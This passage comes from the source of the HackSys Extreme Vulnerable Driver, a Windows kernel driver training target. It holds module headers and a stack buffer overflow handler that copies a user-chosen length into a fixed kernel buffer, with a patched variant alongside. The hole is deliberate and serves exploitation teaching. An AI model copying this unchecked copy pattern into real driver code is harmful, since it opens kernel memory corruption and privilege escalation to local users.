24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryIncrement.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | arbitrary increment module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __ARBITRARY_INCREMENT_H__
54 | #define __ARBITRARY_INCREMENT_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
63 | NTSTATUS
64 | TriggerArbitraryIncrement(
65 | _In_ PVOID UserBuffer
66 | );
67 |
68 | #endif // !__ARBITRARY_INCREMENT_H__
69 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/ArbitraryReadWriteHelperNonPagedPoolNx.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryReadWriteHelperNonPagedPoolNx.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | arbitrary read write helper in NonPagedPoolNx module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __ARBITRARY_READ_WRITE_HELPER_NON_PAGED_POOL_NX_H__
54 | #define __ARBITRARY_READ_WRITE_HELPER_NON_PAGED_POOL_NX_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
63 | #define MAX_OBJECT_COUNT 65535
64 | #define STATUS_INVALID_INDEX ((NTSTATUS)-1L)
65 |
66 |
67 | //
68 | // Structures
69 | //
70 |
71 | typedef struct _ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
72 | {
73 | PVOID Name;
74 | SIZE_T Length;
75 | } ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, *PARW_HELPER_OBJECT_NON_PAGED_POOL_NX;
76 |
77 | typedef struct _ARW_HELPER_OBJECT_IO
78 | {
79 | PVOID HelperObjectAddress;
80 | PVOID Name;
81 | SIZE_T Length;
82 | } ARW_HELPER_OBJECT_IO, *PARW_HELPER_OBJECT_IO;
83 |
84 |
85 | //
86 | // Function Definitions
87 | //
88 |
89 | INT
90 | GetFreeIndex(
91 | VOID
92 | );
93 |
94 | INT
95 | GetIndexFromPointer(
96 | _In_ PVOID Pointer
97 | );
98 |
99 | NTSTATUS
100 | CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
101 | _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
102 | );
103 |
104 | NTSTATUS
105 | SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
106 | _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
107 | );
108 |
109 | NTSTATUS
110 | GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
111 | _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
112 | );
113 |
114 | NTSTATUS
115 | DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx(
116 | _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
117 | );
118 |
119 | #endif // !__ARBITRARY_READ_WRITE_HELPER_NON_PAGED_POOL_NX_H__
120 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/ArbitraryWrite.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryWrite.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | arbitrary write module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __ARBITRARY_WRITE_H__
54 | #define __ARBITRARY_WRITE_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _WRITE_WHAT_WHERE
64 | {
65 | PULONG_PTR What;
66 | PULONG_PTR Where;
67 | } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
74 | NTSTATUS
75 | TriggerArbitraryWrite(
76 | _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
77 | );
78 |
79 | #endif // !__ARBITRARY_WRITE_H__
80 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowNonPagedPool.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowNonPagedPool.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in NonPagedPool module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_NON_PAGED_POOL_H__
54 | #define __BUFFER_OVERFLOW_NON_PAGED_POOL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
63 | #define POOL_BUFFER_SIZE 504
64 |
65 |
66 | //
67 | // Function Definitions
68 | //
69 |
70 | NTSTATUS
71 | TriggerBufferOverflowNonPagedPool(
72 | _In_ PVOID UserBuffer,
73 | _In_ SIZE_T Size
74 | );
75 |
76 | #endif // !__BUFFER_OVERFLOW_NON_PAGED_POOL_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowNonPagedPoolNx.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowNonPagedPoolNx.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in NonPagedPoolNx module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_NON_PAGED_POOL_NX_H__
54 | #define __BUFFER_OVERFLOW_NON_PAGED_POOL_NX_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
63 | #ifdef _WIN64
64 | #define POOL_BUFFER_SIZE 496
65 | #else
66 | #define POOL_BUFFER_SIZE 504
67 | #endif
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
74 | NTSTATUS
75 | TriggerBufferOverflowNonPagedPoolNx(
76 | _In_ PVOID UserBuffer,
77 | _In_ SIZE_T Size
78 | );
79 |
80 | #endif // !__BUFFER_OVERFLOW_NON_PAGED_POOL_NX_H__
81 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowPagedPoolSession.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowPagedPoolSession.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in PagedPoolSession module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_PAGED_POOL_SESSION_H__
54 | #define __BUFFER_OVERFLOW_PAGED_POOL_SESSION_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
63 | #define POOL_BUFFER_SIZE 504
64 |
65 |
66 | //
67 | // Function Definitions
68 | //
69 |
70 | NTSTATUS
71 | TriggerBufferOverflowPagedPoolSession(
72 | _In_ PVOID UserBuffer,
73 | _In_ SIZE_T Size
74 | );
75 |
76 | #endif // !__BUFFER_OVERFLOW_PAGED_POOL_SESSION_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowStack.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStack.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | buffer overflow in Stack vulnerability.
48 |
49 | --*/
50 |
51 | #include "BufferOverflowStack.h"
52 |
53 | #ifdef ALLOC_PRAGMA
54 | #pragma alloc_text(PAGE, TriggerBufferOverflowStack)
55 | #pragma alloc_text(PAGE, BufferOverflowStackIoctlHandler)
56 | #endif // ALLOC_PRAGMA
57 |
58 |
59 | ///
60 | /// Trigger the buffer overflow in Stack Vulnerability
61 | ///
62 | /// The pointer to user mode buffer
63 | /// Size of the user mode buffer
64 | /// NTSTATUS
65 | __declspec(safebuffers)
66 | NTSTATUS
67 | TriggerBufferOverflowStack(
68 | _In_ PVOID UserBuffer,
69 | _In_ SIZE_T Size
70 | )
71 | {
72 | NTSTATUS Status = STATUS_SUCCESS;
73 | ULONG KernelBuffer[BUFFER_SIZE] = { 0 };
74 |
75 | PAGED_CODE();
76 |
77 | __try
78 | {
79 | //
80 | // Verify if the buffer resides in user mode
81 | //
82 |
83 | ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(UCHAR));
84 |
85 | DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
86 | DbgPrint("[+] UserBuffer Size: 0x%zX\n", Size);
87 | DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
88 | DbgPrint("[+] KernelBuffer Size: 0x%zX\n", sizeof(KernelBuffer));
89 |
90 | #ifdef SECURE
91 | //
92 | // Secure Note: This is secure because the developer is passing a size
93 | // equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,
94 | // there will be no overflow
95 | //
96 |
97 | RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));
98 | #else
99 | DbgPrint("[+] Triggering Buffer Overflow in Stack\n");
100 |
101 | //
102 | // Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
103 | // because the developer is passing the user supplied size directly to
104 | // RtlCopyMemory()/memcpy() without validating if the size is greater or
105 | // equal to the size of KernelBuffer
106 | //
107 |
108 | RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
109 | #endif
110 | }
111 | __except (EXCEPTION_EXECUTE_HANDLER)
112 | {
113 | Status = GetExceptionCode();
114 | DbgPrint("[-] Exception Code: 0x%X\n", Status);
115 | }
116 |
117 | return Status;
118 | }
119 |
120 |
121 | ///
122 | /// Buffer Overflow Stack Ioctl Handler
123 | ///
124 | /// The pointer to IRP
125 | /// The pointer to IO_STACK_LOCATION structure
126 | /// NTSTATUS
127 | NTSTATUS
128 | BufferOverflowStackIoctlHandler(
129 | _In_ PIRP Irp,
130 | _In_ PIO_STACK_LOCATION IrpSp
131 | )
132 | {
133 | SIZE_T Size = 0;
134 | PVOID UserBuffer = NULL;
135 | NTSTATUS Status = STATUS_UNSUCCESSFUL;
136 |
137 | UNREFERENCED_PARAMETER(Irp);
138 | PAGED_CODE();
139 |
140 | UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
141 | Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;
142 |
143 | if (UserBuffer)
144 | {
145 | Status = TriggerBufferOverflowStack(UserBuffer, Size);
146 | }
147 |
148 | return Status;
149 | }
150 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowStack.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStack.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in Stack module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_STACK_H__
54 | #define __BUFFER_OVERFLOW_STACK_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
63 | NTSTATUS
64 | TriggerBufferOverflowStack(
65 | _In_ PVOID UserBuffer,
66 | _In_ SIZE_T Size
67 | );
68 |
69 | #endif // !__BUFFER_OVERFLOW_STACK_H__
70 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowStackGS.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStackGS.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in Stack with Guard Stack (GS) module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_STACK_GS_H__
54 | #define __BUFFER_OVERFLOW_STACK_GS_H__
55 |
